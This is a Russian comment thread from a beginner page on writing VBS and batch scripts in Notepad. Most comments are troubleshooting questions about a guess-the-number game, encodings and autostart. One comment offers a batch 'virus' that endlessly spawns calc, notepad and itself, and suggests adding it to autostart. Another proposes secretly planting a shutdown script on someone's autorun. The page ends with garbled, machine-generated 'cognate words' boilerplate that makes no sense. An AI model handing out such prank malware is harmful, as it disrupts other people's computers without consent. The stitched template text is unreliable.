юху я все сделал на обычном блокноте просто исправил некоторые ошибки

здравствуйте.Я заменил все ёлочки на лапки,а при открытие файла выдаёт ошибку

Что то не получается в 1-ом пишет строка 1 символ 1

Для работы этого скрипта нужно заменить ёлочки на лапти, а также тире на минус (a = a — 1).

За скрипт спасибо, а ленивым, кто не может читать текст ошибки и немного подумать — фу.

Я заменил всё ёлочки на лапти

У вас криво написано «Угадайка» (скрипт)
Знаки не те и всё время выдаёт ошибки!
Я уже закалибался исправлять их.

Вот рабочий «Угадайка». На Windows XP проверил.

как открыть программу Excel на заданное количество времени и закрыть ее?

Написал скрипт на приветствие » Привет пончик» у подруги, и она пошла худеть )))

Может кто подсказать как написать скрипт, что бы по указанному времени звук переключался с наушников на колонки? Ночью люблю засыпать слушая музыку в наушниках, что бы никому не мешать, а утром нужен громкий будильник с колонок, поэтому и интересуюсь.

Здравствуйте не подскажите как сделать просто окна для вопросов типо: ты ел? ответы : да или нет и и при нажатие ответа выскакивал другой вопрос и те же ответы )

угадайка на «восьмерке» не работает.. все варианты перепробовал из тех что советовали

Здравствуйте.
Игра «Угадайка» не запускается. Выдаёт ошибку. Что делать?

Заного в угадайке!Как исправить?

Фуфло это «всё», прокисшее!…

У Меня получилось я кинул своим друзьям угадайку и там есть установка и я снял её на ютуб

Для кручения вертушки зажмите любую клавишу

Отредактируйтн пробелами ↑↑↑ звездочки, чтобы получились «плюсик» сверху и «крестик» ниже

Вот вам вирус
@echo off
CLS
:A
start calc.exe
start nitepad.exe
start Archiver.bat
goto A
Сохранить как Archiver.bat (ТАКЖЕ С БЛОЬШОЙ БУКВЫ ИЛИ СКРИПТ НЕ СРАБОТАЕТ ПОЛНОСТЬЮ. )
Для более жесткого эффекта добавьте в код прописку в автозагрузку
Описание:
Это вирус спаммер который бесконечно открывает блокнот, калькулятор и СЕБЯ, чтобы удалением нельщя было остановить процесс открывания

попробовал написал «привет чувак» — всё получилось

Незаметно кому-то подкинуть «выключку» и поставить на автозапуск.

Запустил… пишет строка 1 ошибка: нету слова «sai» Что это значит? (нету слова — это я сказал по другому но смысл один!)

Слишком сложно и не понятно.

Здравствуйте.
Можно ли создать скрипт для вызова из контекстного меню в любой папке, чтобы в этой папке менялся тип группировки и сортировки файлов на заранее заданный? Если да — то как? Спасибо.

как можно писать программи без знания англиского языка

Вин 8.1. Приветствие и автозагрузка сохраненные через notepad++ работают без проблем. Через автозагрузку можно запускать другие программы. Удаление скриптов при сохранение через блокнот выдало ошибку, через notepad++ ошибку не выдает. Остальное не пробывал.

почему у меня не работает ни один код?

ребята помогите пожалуйста, как сделать что бы команда «C:\WINDOWS\system32>netsh wlan start hostednetwork» автоматически запускалась при старте компьютера от имени администратора (windows 10)

Может быть коряво, но работает. Добавил ограничение по количеству попыток, так интересней

Set y = CreateObject(«Scripting.FileSystemObject»)

If x = 1 or x = 2 or x = 3 Then x = 4

MsgBox «Я загадал число от 1 до 100, попробуй отгадать его.» & vbCrLf & «Попытки ограниченны!» & vbCrLf & «Количество попыток: «& x & vbCrLf,64,»Guess Random Number»

k = InputBox(«Угадай число. » & «Попытка: » & a & » из » & x & vbCrLf & vbCrLf & «Чтобы посмотреть результаты введите число!» & vbCrLf & vbCrLf & «Для выхода нажмите Отмена или оставьте поле пустым» & vbCrLf & vbCrLf,»Guess Random Number»)

If k = «число» Then MsgBox «Хитрый какой! Ладно, я загадал число » & Number & «… Просто напиши его и давай уже закончим со всем этим…»,48,»Подсказка!»

If IsNumeric(k) = True Then

MsgBox «Число должно быть в диапозоне от 0 до 100.»,48,»Guess Random Number»

крч смотрите… как быть если комп не знает с помощью какой программы производить — Set sapi=CreateObject(«sapi.spvoice»)
sapi.Speak «Hello!»

Кто в макросах хорошо шарит??

Здравствуйте а вы не можете зделать статью про символы и знаки что бы я/мы могли понимать что написано

Можно ли потом будет убрать скрипт из автозагрузки вручную если
Dim vOrg, objArgs, root, key, WshShell
root = «HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\»
KeyHP = «Program»
Set WshShell = WScript.CreateObject(«WScript.Shell»)
WshShell.RegWrite root+keyHP,»C:\Privet.vbs /autorun»

У кого не работают скрипты, меняйте при сохранении кодировку на ANSI вместо UTF-8

Источник

Теперь вы знаете какие однокоренные слова подходят к слову Как написать игру в блокноте для чайников, а так же какой у него корень, приставка, суффикс и окончание. Вы можете дополнить список однокоренных слов к слову "Как написать игру в блокноте для чайников", предложив свой вариант в комментариях ниже, а также выразить свое несогласие проведенным с морфемным разбором.

Какие вы еще знаете однокоренные слова к слову Как написать игру в блокноте для чайников:



Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *